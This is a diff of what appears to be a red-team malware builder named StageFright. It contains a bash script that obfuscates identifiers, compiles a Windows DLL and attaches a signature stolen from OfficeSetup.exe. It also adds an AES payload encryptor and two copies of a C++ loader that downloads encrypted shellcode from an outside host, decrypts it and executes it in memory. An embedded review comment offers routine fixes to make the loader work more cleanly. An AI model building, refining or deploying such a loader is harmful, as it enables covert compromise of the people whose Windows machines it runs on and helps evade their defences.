+sed -i "s/ENTRYPOINT/$ENTRYPOINT/g" StageFright/HTTPDLL/Resources/template.cpp
+sed -i "s/PORTY/$PORTY/g" StageFright/HTTPDLL/Resources/template.cpp
+sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/HTTPDLL/Resources/template.cpp
+#Replacing Values
+
+# Get Payload From URL Function
+
+#FindShare
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random1=$(cat shell.txt)
+sed -i "s/Random1/$Random1/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#pPayloadBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+Random2=$(cat shell.txt)
+sed -i "s/Random2/$Random2/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#sPayloadSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random3=$(cat shell.txt)
+sed -i "s/Random3/$Random3/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#bSTATE
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
+Random5=$(cat shell.txt)
+sed -i "s/Random5/$Random5/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#sSize
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
+Random6=$(cat shell.txt)
+sed -i "s/Random6/$Random6/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#hInternet
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+Random7=$(cat shell.txt)
+sed -i "s/Random7/$Random7/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#dwBytesRead
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
+Random8=$(cat shell.txt)
+sed -i "s/Random8/$Random8/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#pBytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
+Random9=$(cat shell.txt)
+sed -i "s/Random9/$Random9/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#PAYLOAD
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomA=$(cat shell.txt)
+sed -i "s/RandomA/$RandomA/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#Sleep Function
+
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomJ=$(cat shell.txt)
+sed -i "s/RandomJ/$RandomJ/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#AES KEY NAME
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
+RandomK=$(cat shell.txt)
+sed -i "s/RandomK/$RandomK/g" StageFright/HTTPDLL/Resources/template.cpp
+
+# Main Function
+
+#Bytes
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
+RandomB=$(cat shell.txt)
+sed -i "s/RandomB/$RandomB/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#Size
+cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
+RandomC=$(cat shell.txt)
+sed -i "s/RandomC/$RandomC/g" StageFright/HTTPDLL/Resources/template.cpp
+
+#Compile
+
+echo -e ${yellow}"+++Compiling Malware+++"${clear}
+x86_64-w64-mingw32-g++ -shared -o $MALWARE StageFright/HTTPDLL/Resources/template.cpp -Wno-narrowing -fpermissive -static-libgcc -static-libstdc++ -Wl,--subsystem,windows -lws2_32 -lntdll -lwininet -O2 >/dev/null 2>&1
+echo ""
+sleep 2
+rm shell*
+echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+sleep 2
+echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
+echo ""
+sleep 2
+python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
+
+
+

+ 26 - 0
StageFright/StageFright/StageFright/HTTPDLL/Resources/aesencrypt.py

@@ -0,0 +1,26 @@
+# Red Team Operator course code template
+# payload encryption with AES
+# 
+# author: reenz0h (twitter: @SEKTOR7net)
+
+import sys
+from base64 import b64encode
+from Crypto.Cipher import AES
+from Crypto.Util.Padding import pad
+from Crypto.Random import get_random_bytes
+import hashlib
+
+KEY = get_random_bytes(16)
+iv = 16 * b'\x00'
+cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
+
+try:
+    plaintext = open(sys.argv[1], "rb").read()
+except:
+    print("File argument needed! %s <raw payload file>" % sys.argv[0])
+    sys.exit()
+
+ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
+print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

+ 0 - 0
StageFright/StageFright/StageFright/HTTPDLL/Resources/con.py


+ 221 - 0
StageFright/StageFright/StageFright/HTTPDLL/Resources/template.cpp

@@ -0,0 +1,221 @@
+
+#include <windows.h>
+#include <stdio.h>
+#include <wincrypt.h>
+#include <wininet.h>
+#include <ntstatus.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+#pragma comment(lib, "wininet.lib")
+
+typedef NTSTATUS(WINAPI* PNTALLOCATEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect
+);
+
+typedef NTSTATUS(WINAPI* PNTFREEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType
+);
+
+typedef NTSTATUS(WINAPI* PNTPROTECTVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect
+);
+
+static NTSTATUS(__stdcall* NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) =
+    (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER))GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
+
+static NTSTATUS(__stdcall* ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) =
+    (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG))GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
+
+static void Random4(float milliseconds) {
+    static bool once = true;
+    if (once) {
+        ULONG actualResolution;
+        ZwSetTimerResolution(1, true, &actualResolution);
+        once = false;
+    }
+
+    LARGE_INTEGER interval;
+    interval.QuadPart = -1 * (int)(milliseconds * 10000.0f);
+    NtDelayExecution(false, &interval);
+}
+
+PNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory =
+    (PNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
+
+BOOL gTaJYuusLB(LPCWSTR szUrl, PBYTE* SpgpyXbkF, SIZE_T* pBufferSize) {
+    BOOL bSuccess = TRUE;
+    HINTERNET hInternet = NULL;
+    HINTERNET hUrl = NULL;
+    SIZE_T totalSize = 0;
+    PBYTE pBuffer = NULL;
+    PBYTE pTempBuffer = NULL;
+    DWORD bytesRead = 0;
+
+    // Open Internet session handle
+    hInternet = InternetOpenW(L"Microsoft", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
+    if (hInternet == NULL) {
+        wprintf(L"[!] InternetOpenW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Open handle to the payload using the payload's URL
+    hUrl = InternetOpenUrlW(hInternet, szUrl, NULL, 0, INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, 0);
+    if (hUrl == NULL) {
+        wprintf(L"[!] InternetOpenUrlW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Allocate 1024 bytes for the temp buffer
+    pTempBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024);
+    if (pTempBuffer == NULL) {
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    while (TRUE) {
+        // Read 1024 bytes to the temp buffer
+        if (!InternetReadFile(hUrl, pTempBuffer, 1024, &bytesRead)) {
+            wprintf(L"[!] InternetReadFile Failed With Error : %d \n", GetLastError());
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Calculate the total size of the buffer
+        totalSize += bytesRead;
+
+        // If the total buffer is not allocated yet, allocate it
+        if (pBuffer == NULL)
+            pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, totalSize);
+        else
+            pBuffer = (PBYTE)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pBuffer, totalSize);
+
+        if (pBuffer == NULL) {
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Append the temp buffer to the end of the total buffer
+        memcpy(pBuffer + (totalSize - bytesRead), pTempBuffer, bytesRead);
+
+        // Clean up the temp buffer
+        memset(pTempBuffer, 0, bytesRead);
+
+        // If less than 1024 bytes were read, exit the loop
+        if (bytesRead < 1024) {
+            break;
+        }
+    }
+
+    // Save results
+    *SpgpyXbkF = pBuffer;
+    *pBufferSize = totalSize;
+
+_EndOfFunction:
+    // Cleanup
+    if (hInternet) InternetCloseHandle(hInternet);
+    if (hUrl) InternetCloseHandle(hUrl);
+
+    return bSuccess;
+}
+
+int aIgJpBPdrAbA(char* difern, unsigned int difern_len, char* uGORTNsaW, size_t uGORTNsaWlen) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+
+    if (!CryptHashData(hHash, (BYTE*)uGORTNsaW, (DWORD)uGORTNsaWlen, 0)) {
+        return -1;
+    }
+
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)difern, &difern_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char uGORTNsaW[] =  { 0x5d, 0x27, 0x8, 0x17, 0x2c, 0x50, 0x6a, 0x59, 0x91, 0xb, 0xea, 0x8c, 0xe9, 0x99, 0xb8, 0x11 };
+
+extern "C" void CALLBACK Go(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    // URL to download the payload from
+    LPCWSTR szUrl = L"http://192.168.1.19:8080/invoice.txt";  // Replace with your actual URL
+
+    PBYTE SpgpyXbkF;
+    SIZE_T SpgpyXbkFSize = 0;
+
+    FreeConsole();
+
+    // Download the payload
+    if (!gTaJYuusLB(szUrl, &SpgpyXbkF, &SpgpyXbkFSize)) {
+        printf("[!] gTaJYuusLB Failed\n");
+        return 1;
+    }
+
+    // Decrypt payload
+    aIgJpBPdrAbA((char*)SpgpyXbkF, SpgpyXbkFSize, uGORTNsaW, sizeof(uGORTNsaW));
+
+    // Allocate Virtual Memory
+    void* exec = NULL;
+    SIZE_T size = SpgpyXbkFSize;
+    NTSTATUS status = NtAllocateVirtualMemory(
+        GetCurrentProcess(),
+        &exec,
+        0,
+        &size,
+        MEM_COMMIT | MEM_RESERVE,
+        PAGE_READWRITE
+    );
+    
+    // Copy shellcode into allocated memory
+    memcpy(exec, SpgpyXbkF, SpgpyXbkFSize);
+
+    // Change the memory protection to RX (Read and Execute)
+    DWORD oldProtect;
+   
+if (VirtualProtect(exec, size, PAGE_EXECUTE_READ, &oldProtect) == 0) {
+    // Handle error if needed
+    return -1;
+}
+
+    // Execute shellcode in memory
+    ((void(*)())exec)();
+
+    // Free the allocated memory using NtFreeVirtualMemory
+    PNTFREEVIRTUALMEMORY NtFreeVirtualMemory =
+        (PNTFREEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtFreeVirtualMemory");
+    SIZE_T regionSize = 0;
+    status = NtFreeVirtualMemory(GetCurrentProcess(), &exec, &regionSize, MEM_RELEASE);
+
+    return 0;
+}
+
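Review bot: `Go` is declared `extern "C" void CALLBACK ...`, yet its body contains `return 1;`, `return -1;` and `return 0;`; returning a value from a void function is ill-formed C++ and only compiles because the build line passes `-fpermissive`, so these should become plain `return;` (the same applies to `ENTRYPOINT` in HTTPDLL/template.cpp, which is otherwise identical). In `gTaJYuusLB`, `pTempBuffer` is obtained from HeapAlloc but never released on any path; adding `if (pTempBuffer) HeapFree(GetProcessHeap(), 0, pTempBuffer);` under `_EndOfFunction:` closes the leak, and the WinINet handles should be closed child-first (`hUrl` before `hInternet`) per the WinINet documentation. The `status` returned by `NtAllocateVirtualMemory` is assigned but never inspected, which a `(void)` cast or a check should make explicit. This Resources/ copy looks like a build output rather than source — the placeholders of HTTPDLL/template.cpp (`HOSTIP`, `PORTY`, `SHELLCODEFILE`, `KEYVALUE`) already appear substituted with concrete values here — so it is presumably regenerated by the script on every run and should be ignored rather than committed.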

+ 4 - 0
StageFright/StageFright/StageFright/HTTPDLL/conv.py

@@ -0,0 +1,4 @@
+buf=PAYVAL 
+payload = bytes(bytearray(buf))
+with open('payload.bin', 'wb') as f:
+    f.write(payload)

+ 221 - 0
StageFright/StageFright/StageFright/HTTPDLL/template.cpp

@@ -0,0 +1,221 @@
+
+#include <windows.h>
+#include <stdio.h>
+#include <wincrypt.h>
+#include <wininet.h>
+#include <ntstatus.h>
+
+#pragma comment(lib, "crypt32.lib")
+#pragma comment(lib, "advapi32.lib")
+#pragma comment(lib, "wininet.lib")
+
+typedef NTSTATUS(WINAPI* PNTALLOCATEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    ULONG_PTR ZeroBits,
+    PSIZE_T RegionSize,
+    ULONG AllocationType,
+    ULONG Protect
+);
+
+typedef NTSTATUS(WINAPI* PNTFREEVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG FreeType
+);
+
+typedef NTSTATUS(WINAPI* PNTPROTECTVIRTUALMEMORY)(
+    HANDLE ProcessHandle,
+    PVOID* BaseAddress,
+    PSIZE_T RegionSize,
+    ULONG NewProtect,
+    PULONG OldProtect
+);
+
+static NTSTATUS(__stdcall* NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) =
+    (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER))GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
+
+static NTSTATUS(__stdcall* ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) =
+    (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG))GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
+
+static void Random4(float milliseconds) {
+    static bool once = true;
+    if (once) {
+        ULONG actualResolution;
+        ZwSetTimerResolution(1, true, &actualResolution);
+        once = false;
+    }
+
+    LARGE_INTEGER interval;
+    interval.QuadPart = -1 * (int)(milliseconds * 10000.0f);
+    NtDelayExecution(false, &interval);
+}
+
+PNTALLOCATEVIRTUALMEMORY NtAllocateVirtualMemory =
+    (PNTALLOCATEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory");
+
+BOOL Random3(LPCWSTR szUrl, PBYTE* RandomB, SIZE_T* pBufferSize) {
+    BOOL bSuccess = TRUE;
+    HINTERNET hInternet = NULL;
+    HINTERNET hUrl = NULL;
+    SIZE_T totalSize = 0;
+    PBYTE pBuffer = NULL;
+    PBYTE pTempBuffer = NULL;
+    DWORD bytesRead = 0;
+
+    // Open Internet session handle
+    hInternet = InternetOpenW(L"Microsoft", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
+    if (hInternet == NULL) {
+        wprintf(L"[!] InternetOpenW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Open handle to the payload using the payload's URL
+    hUrl = InternetOpenUrlW(hInternet, szUrl, NULL, 0, INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, 0);
+    if (hUrl == NULL) {
+        wprintf(L"[!] InternetOpenUrlW Failed With Error : %d \n", GetLastError());
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    // Allocate 1024 bytes for the temp buffer
+    pTempBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024);
+    if (pTempBuffer == NULL) {
+        bSuccess = FALSE;
+        goto _EndOfFunction;
+    }
+
+    while (TRUE) {
+        // Read 1024 bytes to the temp buffer
+        if (!InternetReadFile(hUrl, pTempBuffer, 1024, &bytesRead)) {
+            wprintf(L"[!] InternetReadFile Failed With Error : %d \n", GetLastError());
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Calculate the total size of the buffer
+        totalSize += bytesRead;
+
+        // If the total buffer is not allocated yet, allocate it
+        if (pBuffer == NULL)
+            pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, totalSize);
+        else
+            pBuffer = (PBYTE)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pBuffer, totalSize);
+
+        if (pBuffer == NULL) {
+            bSuccess = FALSE;
+            goto _EndOfFunction;
+        }
+
+        // Append the temp buffer to the end of the total buffer
+        memcpy(pBuffer + (totalSize - bytesRead), pTempBuffer, bytesRead);
+
+        // Clean up the temp buffer
+        memset(pTempBuffer, 0, bytesRead);
+
+        // If less than 1024 bytes were read, exit the loop
+        if (bytesRead < 1024) {
+            break;
+        }
+    }
+
+    // Save results
+    *RandomB = pBuffer;
+    *pBufferSize = totalSize;
+
+_EndOfFunction:
+    // Cleanup
+    if (hInternet) InternetCloseHandle(hInternet);
+    if (hUrl) InternetCloseHandle(hUrl);
+
+    return bSuccess;
+}
+
+int Random1(char* difern, unsigned int difern_len, char* Random2, size_t Random2len) {
+    HCRYPTPROV hProv;
+    HCRYPTHASH hHash;
+    HCRYPTKEY hKey;
+
+    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
+        return -1;
+    }
+
+    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
+        return -1;
+    }
+
+    if (!CryptHashData(hHash, (BYTE*)Random2, (DWORD)Random2len, 0)) {
+        return -1;
+    }
+
+    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
+        return -1;
+    }
+    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, (BYTE*)difern, &difern_len)) {
+        return -1;
+    }
+
+    CryptReleaseContext(hProv, 0);
+    CryptDestroyHash(hHash);
+    CryptDestroyKey(hKey);
+
+    return 0;
+}
+
+char Random2[] = KEYVALUE
+
+extern "C" void CALLBACK ENTRYPOINT(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
+    // URL to download the payload from
+    LPCWSTR szUrl = L"http://HOSTIP:PORTY/SHELLCODEFILE";  // Replace with your actual URL
+
+    PBYTE RandomB;
+    SIZE_T RandomBSize = 0;
+
+    FreeConsole();
+
+    // Download the payload
+    if (!Random3(szUrl, &RandomB, &RandomBSize)) {
+        printf("[!] Random3 Failed\n");
+        return 1;
+    }
+
+    // Decrypt payload
+    Random1((char*)RandomB, RandomBSize, Random2, sizeof(Random2));
+
+    // Allocate Virtual Memory
+    void* exec = NULL;
+    SIZE_T size = RandomBSize;
+    NTSTATUS status = NtAllocateVirtualMemory(
+        GetCurrentProcess(),
+        &exec,
+        0,
+        &size,
+        MEM_COMMIT | MEM_RESERVE,
+        PAGE_READWRITE
+    );
+    
+    // Copy shellcode into allocated memory
+    memcpy(exec, RandomB, RandomBSize);
+
+    // Change the memory protection to RX (Read and Execute)
+    DWORD oldProtect;
+   
+if (VirtualProtect(exec, size, PAGE_EXECUTE_READ, &oldProtect) == 0) {
+    // Handle error if needed
+    return -1;
+}
+
+    // Execute shellcode in memory
+    ((void(*)())exec)();
+
+    // Free the allocated memory using NtFreeVirtualMemory
+    PNTFREEVIRTUALMEMORY NtFreeVirtualMemory =
+        (PNTFREEVIRTUALMEMORY)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtFreeVirtualMemory");
+    SIZE_T regionSize = 0;
+    status = NtFreeVirtualMemory(GetCurrentProcess(), &exec, &regionSize, MEM_RELEASE);
+
+    return 0;
+}
+
